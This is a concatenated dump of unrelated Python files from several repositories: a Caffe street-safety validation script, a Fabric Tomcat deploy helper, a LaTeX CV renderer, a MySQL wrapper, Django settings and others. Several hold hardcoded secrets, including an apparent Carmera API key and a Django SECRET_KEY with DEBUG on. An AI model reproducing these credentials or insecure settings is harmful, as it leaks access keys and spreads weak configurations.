# # print("Model saved in file: %s" % save_path)
# #
#
# # Create some variables.
# v1 = tf.Variable([[1, 2, 3]], name="v1")
# v2 = tf.Variable([0], name="v2")
#
# # Add ops to save and restore all the variables.
# saver = tf.train.Saver()
#
# # Later, launch the model, use the saver to restore variables from disk, and
# # do some work with the model.
# with tf.Session() as sess:
# # Restore variables from disk.
# saver.restore(sess, "./model.ckpt")
# print("Model restored.")
#
# print(v2.eval())
import numpy as np
a = np.load("./save/wp.npy")
np.savetxt("./save/wp22.txt",a)
| [
"arash@dargahi.org"
] | arash@dargahi.org |
08dd02119e649205f4935ee844d8221d52578ab9 | e266a4c966657d3f0d7a6847c69ef39828c8a8df | /caffe-deeplearning/sceneTagging/finetune_setup/train01/safe_val.py | 2da251dbe6a0d224cd8b51383764062988211a4d | [] | no_license | patrickbochen/Carmera | 26d8251b23a772441825e8aec109675a39bba27d | 404c2ace3703fe0d6bb17adeaaf6c8a94ff055ed | refs/heads/master | 2021-01-20T22:31:14.708758 | 2016-08-03T18:27:08 | 2016-08-03T18:27:08 | 64,784,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,914 | py | #Validation testing file on 'safe' tag against MIT streetscores
import csv #csv file reader
import random
import os
from carmera import Carmera #Carmea module
#Local machine setup
cm = Carmera(api_key="ff779518b57c98017d46617830829c91e731c302")
#cm.url_base = "http://api-staging.carmera.co" Dont need this, only for staging
im = cm.Image()
#Set up path for caffe
import sys
#This is fucked rn need to fix to download images, i have no idea where the images were put
caffe_root = '../../../../' # this file should be run from {caffe_root}/file/path (aka caffe)
sys.path.insert(0, caffe_root + 'python')
import numpy as np #to run through network
import caffe
# If you get "No module named _caffe", either you have not built pycaffe or you have the wrong path.
#Caffe network setup
#---------------------------------------------------------------------------------------------
#Set up caffe
caffe.set_mode_cpu()
#caffe.set_device(0)
#Set up model - Change this for different models
# model_def = caffe_root + 'models/finetune_scene/train01/deploy.prototxt'
# model_weights = caffe_root + 'models/finetune_scene/train01/snapshots_iter_100000.caffemodel'
model_def = caffe_root + 'Carmera-SceneDetection/createTrain/finetune/train01/deploy.prototxt'
model_weights = caffe_root + 'Carmera-SceneDetection/createTrain/finetune/train01/snapshots_iter_100000.caffemodel'
#Set up network = Do once then dont need to mess with ever again (build network once per run)
net = caffe.Net(model_def, # defines the structure of the model
model_weights, # contains the trained weights
caffe.TEST) # use test mode (e.g., don't perform dropout)
# load the mean ImageNet image (as distributed with Caffe) for subtraction
mu = np.load(caffe_root + 'python/caffe/imagenet/ilsvrc_2012_mean.npy')
mu = mu.mean(1).mean(1) # average over pixels to obtain the mean (BGR) pixel values
# create transformer for the input called 'data'
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1)) # move image channels to outermost dimension
transformer.set_mean('data', mu) # subtract the dataset-mean value in each channel
transformer.set_raw_scale('data', 255) # rescale from [0, 1] to [0, 255]
transformer.set_channel_swap('data', (2,1,0)) # swap channels from RGB to BGR
# set the size of the input (we can skip this if we're happy
# with the default; we can also change it later, e.g., for different batch sizes)
net.blobs['data'].reshape(50, # batch size
3, # 3-channel (BGR) images
227, 227) # image size is 227x227
#File names and locations setup
#---------------------------------------------------------------------------------------------
#File setup
#Name of csv data, which is used to verify data
verify_file = 'streetscore_newyorkcity.csv'
#Name of output file from comparison
results_file = 'safe_comparison.txt'
errors_file = 'safe_errors.txt'
format_results = '%-25s %10s %10s %10s\n'
format_error = '%-25s %40s\n'
fResults = open(results_file, 'a')
fResults.write(format_results % ('Long,Lat', 'Streetscore', 'Network', 'Match'))
fErrors = open(errors_file, 'a')
fErrors.write(format_error % ('Long,Lat', 'Error'))
cutOffImages = 15
data_location = 'data/scene/images/'
#Set up image acquiring and pre processing
#---------------------------------------------------------------------------------------------
#Method to access Euclid and find all the images
def findImages(coordinates, radius):
try:
res = im.search({
'point' : coordinates,
'radius' : radius
})
data = res.json()
return data
except Exception as e:
print(e.code) ## HTTP status code
print(e.error) ## JSON error message
#print(e)
placeholder = 0
#Need to fix this, just randomly did it
def chooseImages(coordinates):
current_radius = 50
large_radius = 150
inc_radius = 10
data = None
while data == None or data['properties']['page_size'] < cutOffImages:
if current_radius > large_radius:
#print ('Not enough images within 150 m at ', coordinates)
return None
data = findImages(coordinates, current_radius)
current_radius += inc_radius
#if data stil bad just skip this dat point
#randomly choose #cutOffImages images from data
#return these images
image_ids = []
for feature in data['features']:
image_ids.append(feature['properties']['id'])
random.shuffle(image_ids)
return image_ids[:cutOffImages]
#Need a method to download images
def downloadImages(images):
for image_id in images:
#file_exists = caffe_root + 'data/scene/images/' + str(image_id) + '.jpg'
#if os.path.isfile(file_exists):
#print (image_id, 'exists')
# continue
#else:
try:
#print (image_id)
res = im.download(image_id, caffe_root + data_location +
'{}.jpg'.format(image_id))
sleep(1)
except Exception as e:
fErrors.write(format_error %
(str(image_id), 'Unable to download following image'))
print('Something went wrong with downloading image ' + str(image_id))
print(e)
#Clean up images from machine after downloading them
def cleanImages(images):
for image_id in images:
file_exists = caffe_root + data_location + '{}.jpg'.format(image_id)
if os.path.isfile(file_exists):
os.remove(file_exists)
#Running images through network
#---------------------------------------------------------------------------------------------
#Run through network
def runThroughNetwork(images, cutOffValue):
cutoff_network_probability = .5
safe_cnn = 0
num_images = len(images)
for image_id in images:
file_exists = caffe_root + data_location + '{}.jpg'.format(image_id)
if (not os.path.isfile(file_exists)):
safe_cnn *= (num_images/(num_images-1))
num_images -= 1
fErrors.write(format_error %
(str(image_id), 'The image disappeared or was never downloaded'))
continue
image = caffe.io.load_image(file_exists)
transformed_image = transformer.preprocess('data', image)
net.blobs['data'].data[...] = transformed_image
output = net.forward()
#the output probability vector for the first image in the batch
output_prob = output['prob'][0]
safe_prob = output_prob[0] #Index of safe = 0 (place in label_names.txt)
#print (safe_prob)
if (safe_prob >= cutOffValue):
safe_cnn += (1.00/num_images)
if safe_cnn < cutoff_network_probability:
return 'Unsafe'
else:
return 'Safe'
#Validation testing logic
#---------------------------------------------------------------------------------------------
coord_counter = 1297
matches_counter = 672
with open(verify_file) as csvfile: #Creates csv file object
#reader = csv.reader(csvfile) #Creates csvfile reader
#Skip first some rows in the csv file
#for i in range(1234):
# reader.next()
#row: [lat, long, q-score]
reader = [['40.700909','-74.013504','11.062166']]
# ['40.752728', '-73.971451' ,'26.864557']}
#row = ['40.752728', '-73.971451' ,'26.864557']
for row in reader:
coordinates = row[1] + ',' + row[0]
print (coordinates)
qscore = float(row[2])
if qscore < 4.5:
hot_safe = 'Unsafe'
elif qscore > 5.5:
hot_safe = 'Safe'
else:
print ('Indecisive qscore')
fErrors.write(format_error % (coordinates, 'Indecisive qscore'))
continue
image_ids = chooseImages(coordinates)
if image_ids == None:
print ('Not enough images')
fErrors.write(format_error %
(coordinates, 'Less than 10 images in 150m radius'))
continue
coord_counter += 1
if coord_counter % 20 == 0:
print('Number of coordinates covered: {}'.format(coord_counter))
print('Number of matching coordinates: {}'.format(matches_counter))
#print ('Coordinate Number {}'.format(coord_counter))
fResults.flush()
fErrors.flush()
downloadImages(image_ids)
network_safe = runThroughNetwork(image_ids, .01)
fResults.write(format_results %
(coordinates, hot_safe, network_safe, (hot_safe==network_safe)))
if hot_safe==network_safe:
matches_counter += 1
cleanImages(image_ids)
fResults.close()
fErrors.close()
print('Number of coordinates covered: {}'.format(coord_counter))
print('Number of matching coordinates: {}'.format(matches_counter))
| [
"patrickbochen@gmail.com"
] | patrickbochen@gmail.com |
2a9692f84fde912561c1af5585e107e2933da948 | 1ca71cd18de29def84ab70818b12633f96247ecd | /deploy_service.py | a15bedf3cbf63a258db262b4967e2d175cf67815 | [] | no_license | masonchen2014/alipython | 2e3286728025ecfe712e26afe37f160b44700d7e | 1b6e747611fefd01e706d6035d40b0198798ebc8 | refs/heads/master | 2020-03-09T21:46:38.459738 | 2018-04-20T08:52:29 | 2018-04-20T08:52:29 | 129,018,236 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,916 | py | from fabric.api import *
from configparser import ConfigParser
from aliyun import AliHelper
import time
import requests
class DeployServce:
def __init__(self,war_file_path,target_tmp_path,tomcat_path,service_port,service_name,slb_id,health,alihelper):
self.wpath = war_file_path.rstrip('/')
self.wfile = self.wpath[self.wpath.rfind('/')+1:]
self.ttpath = target_tmp_path.rstrip('/')+'/'
self.tomcatpath = tomcat_path.rstrip('/')+'/'
self.tpath = tomcat_path.rstrip('/')+'/webapps/'
self.sport = service_port
self.sname = service_name
self.slb_id = slb_id
self.health = health
self.alihelper = alihelper
self.hostDict = {}
def get_hosts(self,instanceDict,slbDict):
innerHosts = []
pubHosts = []
regionId,serverIds = self.alihelper.get_backend_servers_from_dict(slbDict,self.slb_id)
for serverId in serverIds:
iHost,pHost = self.alihelper.get_server_ip_from_dict(instanceDict,serverId)
innerHosts.append(iHost)
pubHosts.append(pHost)
self.hostDict[pHost] = serverId
self.regionId = regionId
self.serverId = serverId
return pubHosts
def set_host_weight(self,host,weight):
# print(self.regionId)
# print(self.slb_id)
# print(self.serverId[index])
# print(weight)
self.alihelper.set_backend_server('slb.aliyuncs.com','2014-05-15',self.regionId,self.slb_id,self.hostDict[host],weight)
def mkdir_remote(self):
sudo('mkdir -p '+self.ttpath)
sudo('mkdir -p /home/bak/'+self.sname)
def upload_file(self):
put('./shutdown_tomcat.sh',self.ttpath+'shutdown_tomcat.sh',use_sudo=True)
put(self.wpath,self.ttpath+self.wfile,use_sudo=True)
def shutdown_tomcat(self):
sudo('bash '+self.ttpath+'shutdown_tomcat.sh '+self.sport+' '+self.tomcatpath)
def copy_war(self):
tswfile =self.wfile+'.'+repr(time.time())
sudo('mv '+self.tpath+self.wfile+' /home/bak/'+self.sname+'/'+tswfile)
sudo('cp '+self.ttpath+self.wfile+' '+self.tpath)
sudo('rm -rf '+self.tpath+self.wfile.rstrip('.war'))
def start_tomcat(self):
sudo('set -m;bash '+self.tomcatpath+'bin/startup.sh &')
def test_tomcat(self,host,trytimes):
health_page = 'http://'+host+':'+self.sport+self.health
try_times = trytimes
i = 1
while i <= try_times:
i = i+1
time.sleep(5)
print(health_page)
res = requests.get(health_page)
# print('we now get the status')
if res.status_code == 200:
print('service started!')
break
else:
print('can not access the service!!!')
# run('curl -v localhost:'+self.sport)
class DeployServices:
def __init__(self,config,alihelper):
parser =ConfigParser()
parser.read(config)
sections = parser.sections()
self.servicesDict = {}
for section in sections:
wpath = parser.get(section,'war_file_path')
ttpath = parser.get(section,'target_tmp_path')
tomcatpath = parser.get(section,'tomcat_path')
sport = parser.get(section,'service_port')
sname = parser.get(section,'service_name')
slbid = parser.get(section,'slb_id')
health = parser.get(section,'health')
ds = DeployServce(wpath,ttpath,tomcatpath,sport,sname,slbid,health,alihelper)
self.servicesDict[section] = ds
def get_services(self,*service_names):
services = []
for sname in service_names:
if sname in self.servicesDict:
services.append(self.servicesDict[sname])
else:
print('unknown service name '+sname)
return services
| [
"mason@localhost.localdomain"
] | mason@localhost.localdomain |
e464c2381b3c080603299e821958e97a5e00965b | fca0173560876c5f43aac5ecd2d41330d1d22b5d | /cv/tex.py | 048ecbc375de1623ad308242ec907bc8266baf6a | [] | no_license | jorgebg/cv | 9223bba1e64322fb47e4d33536818ba3fe55bee1 | 24437e4f558e697bfe7abb1f512d9745f6dc6df3 | refs/heads/master | 2020-12-12T05:37:35.226132 | 2020-05-19T17:23:09 | 2020-05-19T17:23:09 | 29,673,733 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,664 | py | import re
import sys
from functools import namedtuple
import mistune
import jinja2
import cv
from cv.templated import Templated
ESCAPE_CHARS = {
'&': r'\&',
'%': r'\%',
'$': r'\$',
'#': r'\#',
'_': r'\letterunderscore{}',
'{': r'\letteropenbrace{}',
'}': r'\letterclosebrace{}',
'~': r'\lettertilde{}',
'^': r'\letterhat{}',
'\\': r'\letterbackslash{}',
}
def escape(text, quote=False, smart_amp=True):
return "".join([ESCAPE_CHARS.get(char, char) for char in text])
class Environment(jinja2.Environment):
def __init__(self):
super().__init__('%{', '}', '#{', '}', '%', "\n")
self.filters.update({
'def': self.def_filter,
'e': escape,
'escape': escape
})
def def_filter(self, defs):
result = ""
for key, value in defs.items():
value = escape(value)
template = self.from_string(r"\def\#{key}{#{value | e}}")
result += template.render(key=key, value=value) + "\n"
return result
class Renderer(mistune.Renderer):
ENV = Environment()
_t = Templated(ENV)
@_t
def block_code(self, code, lang=None):
return \
r"""
\begin{verbatim}
#{code}
\end{verbatim}
"""
@_t
def block_quote(self, text):
return \
r"""
\begin{quote}
#{text}
\end{quote}
"""
@_t
def header(self, text, level, raw=None):
if level > 3:
raise NotImplemented()
section = ('sub' * (level - 1)) + 'section'
return \
r"""
\#{section}{#{text}}
""", vars()
@_t
def hrule(self):
return \
r"""
\hrule
"""
@_t
def list(self, body, ordered=True):
env = 'enumerate' if ordered else 'itemize'
return \
r"""
\begin{#{env}}
#{body}
\end{#{env}}
""", vars()
@_t
def list_item(self, text):
return \
r"""
\item #{text}
"""
@_t
def paragraph(self, text):
return \
r"""
#{text} \par
"""
@_t
def double_emphasis(self, text):
return r"\textbf{#{text}}"
@_t
def emphasis(self, text):
return r"\emph{#{text}}"
@_t
def codespan(self, text):
return r"\texttt{#{text}}"
@_t
def linebreak(self):
return r"\\"
@_t
def autolink(self, link, is_email=False):
if is_email:
raise NotImplemented()
web = re.compile(r'^https?://').sub('', link)
web = escape(web)
return r"\web{#{web}}", vars()
@_t
def link(self, link, title, text):
return r"\anchor{#{link}{#{title}}"
class CVRenderer(Renderer):
_t = Renderer._t
Section = namedtuple('Section', ['env', 'text', 'level', 'raw'])
def __init__(self, *args, **kwargs):
self.sections = []
super().__init__(*args, **kwargs)
def end(self):
return "\n".join(self.endenv())
def endenv(self, level=0):
envs = []
while self.sections and level <= self.sections[-1].level:
ended = self.sections.pop()
if ended.level < 2:
template = self.ENV.from_string(r"\end{#{env}}")
envs.append(template.render(**ended._asdict()))
return envs
def beginenv(self, section):
envs = []
if section.level > 1:
envs.append(super().header(section.text, section.level, section.raw))
if section.level < 2:
template = self.ENV.from_string(r"\begin{#{env}}")
envs.append(template.render(**section._asdict()))
return envs
@_t
def hrule(self):
return \
r"""
\hrulefill
"""
@_t
def block_quote(self, text):
env = 'quote'
if self.sections:
env = '{}_{}'.format(self.sections[-1].env, env)
return \
r"""
\begin{#{env}}#{text}
\end{#{env}}
""", vars()
@_t
def header(self, text, level, raw=None):
endenv = self.endenv(level)
if level > 1:
i = -len('section')
rootenv = self.sections[0].env
sectionenv = rootenv[:i] + ('sub' * (level - 1)) + rootenv[i:]
else:
sectionenv = text.lower().replace(' ', '_') + '_section'
section = self.Section(sectionenv, text, level, raw)
self.sections.append(section)
beginenv = self.beginenv(section)
return "\n".join(endenv + beginenv)
class Parser(mistune.Markdown):
def output(self, text, rules=None):
return super().output(text, rules) + self.renderer.end()
class Builder(cv.Builder):
def __init__(self):
parser = Parser(renderer=CVRenderer(), hard_wrap=True)
super().__init__(parser = parser, env=Renderer.ENV)
def run(self, doc):
_escape = mistune.escape
mistune.escape = escape
super().run(doc)
mistune.escape = _escape
| [
"jorge.barata.gonzalez@gmail.com"
] | jorge.barata.gonzalez@gmail.com |
a9a995593bea8486c1a66b449b79bb38b75bd42d | e732b4d8ae47cfc6b3c051c1792268928dbfaaf8 | /mk_doc_vectors.py | 17831954f69475e3760a2becf9168f0318d2e48d | [] | no_license | ml-for-nlp/topic-classification | 584aa186bedd1dce8fb4747f3185175de77eb2cd | 882157805439d7b403499942b6aab1e4d0541d6d | refs/heads/master | 2020-04-30T23:24:52.416033 | 2020-04-10T07:50:32 | 2020-04-10T07:50:32 | 177,143,542 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,800 | py | #USAGE: python3 mk_doc_vectors.py
import re
import sys
import numpy as np
from math import isnan
from os import listdir
from os.path import isfile, isdir, join
from sklearn.decomposition import PCA
feature_type = sys.argv[1]
def read_vocab():
with open('./data/vocab_file.txt','r') as f:
vocab = f.read().splitlines()
return vocab
def get_words(l):
l=l.lower()
words = {}
for word in l.split():
if word in words:
words[word]+=1
else:
words[word]=1
return words
def get_ngrams(l,n):
l = l.lower()
ngrams = {}
for i in range(0,len(l)-n+1):
ngram = l[i:i+n]
if ngram in ngrams:
ngrams[ngram]+=1
else:
ngrams[ngram]=1
return ngrams
def normalise(v):
return v / sum(v)
def run_PCA(d,docs):
m = []
retained_docs = []
for url in docs:
if not isnan(sum(d[url])) and sum(d[url]) != 0:
m.append(d[url])
retained_docs.append(url)
pca = PCA(n_components=300)
pca.fit(m)
m_300d = pca.transform(m)
return np.array(m_300d), retained_docs
def clean_docs(d,docs):
m = []
retained_docs = []
for url in docs:
if not isnan(sum(d[url])) and sum(d[url]) != 0:
m.append(d[url])
retained_docs.append(url)
return np.array(m), retained_docs
d = './data'
catdirs = [join(d,o) for o in listdir(d) if isdir(join(d,o))]
vocab = read_vocab()
for cat in catdirs:
print(cat)
url = ""
docs = []
vecs = {}
doc_file = open(join(cat,"linear.txt"),'r')
for l in doc_file:
l=l.rstrip('\n')
if l[:4] == "<doc":
m = re.search("date=(.*)>",l)
url = m.group(1).replace(',',' ')
docs.append(url)
vecs[url] = np.zeros(len(vocab))
if l[:5] == "</doc":
vecs[url] = normalise(vecs[url])
print(url,sum(vecs[url]))
if feature_type == "ngrams":
for i in range(3,7):
ngrams = get_ngrams(l,i)
for k,v in ngrams.items():
if k in vocab:
vecs[url][vocab.index(k)]+=v
if feature_type == "words":
words = get_words(l)
for k,v in words.items():
if k in vocab:
vecs[url][vocab.index(k)]+=v
doc_file.close()
m,retained_docs = clean_docs(vecs,docs)
print("------------------")
print("NUM ORIGINAL DOCS:", len(docs))
print("NUM RETAINED DOCS:", len(retained_docs))
vec_file = open(join(cat,"vecs.csv"),'w')
for i in range(len(retained_docs)):
vec_file.write(retained_docs[i]+','+','.join([str(v) for v in m[i]])+'\n')
vec_file.close()
| [
"aurelie.herbelot@cantab.net"
] | aurelie.herbelot@cantab.net |
947c86d39b47a7af1728173b26c2bd6fe0390e27 | 75c227dcb962282ba40084ecba70b6b9bc0b6810 | /5.3.py | cb178b39292eeb69e4cb232642e00e2a7e77f370 | [] | no_license | vedantvajre/PythonDataScience | 3b87b2991f42bad4db1d44396c36bd4dff731cec | 3795225e4633b10ad3b881405ebef5d0327ae972 | refs/heads/master | 2020-06-11T08:10:08.869872 | 2019-06-26T22:06:29 | 2019-06-26T22:06:29 | 193,900,921 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | alien_color = "red"
if alien_color == "red":
print("You have earned 5 points!")
alien_color = "yellow"
if alien_color == "red":
print("You won!") | [
"vedantvajre@gmail.com"
] | vedantvajre@gmail.com |
65e7651930393e2c836a4314c0ed1bdf3349fe6f | 68b41912ce7f37cc56fad963f12e1a934ea959e6 | /model/core/output.py | 0b9d1ef9eb753513056018b52da8b8c2da1e6910 | [
"MIT"
] | permissive | BernardTsai/model | 730cfe9371819c781f73f5515996e6465a4b3131 | 950a8d34106ddfb7ef7985a3eca6d72524733c38 | refs/heads/master | 2023-04-16T17:11:34.384982 | 2021-04-20T18:24:42 | 2021-04-20T18:24:42 | 103,212,329 | 0 | 0 | MIT | 2021-04-20T18:24:43 | 2017-09-12T02:32:04 | Python | UTF-8 | Python | false | false | 3,410 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# output.py:
#
# A class to provide functionality for writing data.
#
# ------------------------------------------------------------------------------
import os
import sys
import re
import codecs
# ------------------------------------------------------------------------------
#
# Class Output
#
# ------------------------------------------------------------------------------
class Output():
# --------------------------------------------------------------------------
def __init__(self, directory=None):
"""Initialize"""
self.directory = directory
self.data = None
self.filenames = []
self.blocks = []
# --------------------------------------------------------------------------
def write(self, data):
"""Write blocks of data to STDOUT or a file"""
self.data = data
self.filenames = []
self.blocks = []
# check if the data contains special output statement lines:
# ">> [path] [comments]\n" which advise to output the following
# data to a file location indicated by the [path] argument
block = ""
filename = ""
for line in self.data.splitlines():
# determine new filename: ">> [filename] [comments]"
match = re.match(">> ([^ ]*)(.*)", line)
if match:
# write the existing block
if block != "":
self.write2(filename, block)
# reset block and file name
block = ""
# set new file name
filename = match.group(1)
else:
if block == "":
block = line
else:
block += "\n" + line
# write last block
self.write2(filename, block)
# --------------------------------------------------------------------------
def write2(self, filename, block):
"""Write block to STDOUT or a file"""
self.blocks.append( block )
# write to stdout if no filename has been provided
if filename == "" or filename is None:
self.filenames.append( "STDOUT" )
print( block )
# write to file
else:
if self.directory:
filepath = os.path.join( self.directory, filename )
else:
filepath = filename
self.filenames.append( filepath )
# write block as text file
with codecs.open(filepath, "w", "utf-8") as stream:
stream.write(block)
# --------------------------------------------------------------------------
def getDirectory(self):
"""Provide directory"""
return self.directory
# --------------------------------------------------------------------------
def getData(self):
"""Provide raw data"""
return self.data
# --------------------------------------------------------------------------
def getFilenames(self):
"""Provide filenames"""
return self.filenames
# --------------------------------------------------------------------------
def getBlocks(self):
"""Provide blocks"""
return self.blocks
| [
"bernard@tsai.eu"
] | bernard@tsai.eu |
238b0ff7d600e6fc3bd33dae6392ff807f618e64 | d869f6e6b0c07341086402325f193ac6b2cc2191 | /program accept two numbers and identify even number out of them..py | 64fef27c2232a794ac207b713e2e93354649ac40 | [] | no_license | SARAOGIAMAN/PYTHON-PROGRAMS | 46811a161c0020f4f23b5d617c9e5dca03543184 | deae16b35a569f79e53e79a8cba3e711a628a7d7 | refs/heads/main | 2023-02-13T23:18:57.376444 | 2021-01-11T17:17:23 | 2021-01-11T17:17:23 | 310,389,061 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | a = int(input("Enter a: "))
b = int(input("Enter b: "))
if(a%2==0 and b%2==1):
print("a is even")
elif(b%2==0 and a%2==1):
print("b is even")
elif(a%2==0 and b%2==0):
print("Both are even")
else:
print("Both are odd")
| [
"noreply@github.com"
] | SARAOGIAMAN.noreply@github.com |
07f2933b9cadfb1eecf85bdfb76c97d0c29a75a4 | 1a721736f3fd57b0fffcac7b9481e3b6b272909d | /IT - 412/finalAssignment/classes/database_access.py | 26958d8fd76940a94bae153917f739ac33fd4913 | [] | no_license | vifezue/PythonWork | eed6609f2b56aa038082e599476f7ba3b8c471a0 | c9fc7f312f9d73fef6af6d13459ea4a69b16cdca | refs/heads/master | 2022-11-28T10:42:10.246227 | 2020-07-18T03:40:42 | 2020-07-18T03:40:42 | 280,537,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,843 | py | import pymysql
class DB_Connect():
"""A simple class for connecting to a database and performing queries"""
def __init__(self, passed_db_username, passed_db_password, passed_database):
"""Initialize name and age variables/attributes"""
self.passed_db_username = passed_db_username
self.passed_db_password = passed_db_password
self.passed_database = passed_database
self.conn = None
def __connect(self):
"""Creates connections to the database when they are needed"""
self.conn = pymysql.connect(host='localhost',
user=self.passed_db_username,
password=self.passed_db_password,
db=self.passed_database,
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
autocommit=True)
def executeQuery(self, passed_query):
"""Executes a database query for Inserts, Updates, and Deletes"""
try:
if not self.conn:
self.__connect()
with self.conn.cursor() as cursor:
self.conn
cursor.execute(passed_query)
except Exception as error:
print(error)
self.conn.close()
def executeSelectQuery(self, passed_query):
"""Executes a SELECT database query and returns the results as a tuple-like structure"""
try:
self.__connect()
if not self.conn:
self.__connect()
with self.conn.cursor() as cursor:
cursor.execute(passed_query)
return cursor.fetchall()
except Exception as error:
print(error)
self.conn.close()
| [
"ifezue@me.com"
] | ifezue@me.com |
33c31ecade4b4b77e84825f895244dbb093f7e64 | 67e96382f822c8e1fd4ed80aef42afc1582d8a2e | /main_web/everyoneSays/everyoneSays/settings.py | fc82ecb253f907159ffa918083e5cba0e6e54c27 | [] | no_license | Salaah01/everyoneSays | a6e33953bc63c660006c2a2b80d74748069cf0ef | 3954b0e308ead05fda27de6b4ad16a6fe4c7eb86 | refs/heads/master | 2023-08-05T09:15:12.694362 | 2020-07-13T23:28:31 | 2020-07-13T23:28:31 | 265,930,263 | 0 | 0 | null | 2021-09-22T19:05:27 | 2020-05-21T19:06:27 | Python | UTF-8 | Python | false | false | 3,264 | py | """
Django settings for everyoneSays project.
Generated by 'django-admin startproject' using Django 3.0.6.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mx!$^gnjo-*#nrv#&&pg+ck2!sz^-_f7q%(z08$!*fc&xs5&j4'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'everyoneSays.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'everyoneSays.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-gb'
TIME_ZONE = 'GMT'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'everyoneSays/static')
]
| [
"salaah_amin@hotmail.co.uk"
] | salaah_amin@hotmail.co.uk |
18d91998f069b763cffeb5751854cb7b5941f797 | c1e6716beacee4dfb4f4c167c76dac0e2fd7e412 | /LeetCode/简单1/最小栈.py | f2aa5b2e8265e00eefc927bf5bfbac3050f63471 | [] | no_license | xiyangxitian1/learn_days | 68922ee986d1e4d38e1162c41e122ae42a269fc7 | 971cc2f674d53cf33a621a3a608f32a53603438a | refs/heads/master | 2020-10-01T16:54:49.758022 | 2019-12-22T08:47:52 | 2019-12-22T08:47:52 | 227,581,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 917 | py | # 设计一个支持 push,pop,top 操作,并能在常数时间内检索到最小元素的栈。
#
# push(x) -- 将元素 x 推入栈中。
# pop() -- 删除栈顶的元素。
# top() -- 获取栈顶元素。
# getMin() -- 检索栈中的最小元素。
class MinStack:
"""
这样效率太低了
"""
def __init__(self):
"""
initialize your data structure here.
"""
self.list = list()
self.helper = list()
def push(self, x: int) -> None:
if not self.helper or self.helper[-1] >= x:
self.helper.append(x)
self.list.append(x)
def pop(self) -> None:
pop_num = self.list.pop()
if self.helper[-1] == pop_num:
self.helper.pop()
def top(self) -> int:
return self.list[-1] if self.list else None
def getMin(self) -> int:
return self.helper[-1] if self.helper else None
| [
"liyan@live.shop.edu.cn"
] | liyan@live.shop.edu.cn |
d05dbb737e6f7f1d13acf87f02e74b21e6cc590f | de6a49b76f940b2b015c45d8024d60ec0925b48f | /Logger.py | 06445e530c9232236636303faf499a7039eba3ee | [
"MIT"
] | permissive | purboday/app.REMAppGroups | a06aa644d63a81783fb71797a7c5e975e5c8d3fd | 4c4e18f1cfc147d8ff297b535dd6946d4dedd4bb | refs/heads/master | 2023-06-13T02:13:16.146912 | 2021-07-08T20:38:20 | 2021-07-08T20:38:20 | 384,240,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,128 | py | '''
Logger component
- log msg format: (tag, measurement, [ time ], [ values ])
'''
from riaps.run.comp import Component
from influxdb import InfluxDBClient
from influxdb.client import InfluxDBClientError
import json
import logging
from datetime import datetime
import os
import yaml
BATCH_SIZE = 60
class Logger(Component):
def __init__(self, configfile):
super().__init__()
_config = "config/" + configfile
with open(_config, 'r') as stream:
try:
db_config= yaml.safe_load(stream)
except yaml.YAMLError as exc:
print(exc)
self.db_name = db_config['db_name']
self.db_drop = db_config['db_drop']
self.point_values = []
try:
self.client = InfluxDBClient(host=db_config['db_host'], port=db_config['db_port'],
database=db_config['db_name'], username=db_config['db_user'], password=db_config['db_password'])
self.client.create_database(db_config['db_name'])
self.client.switch_database(db_config['db_name'])
except:
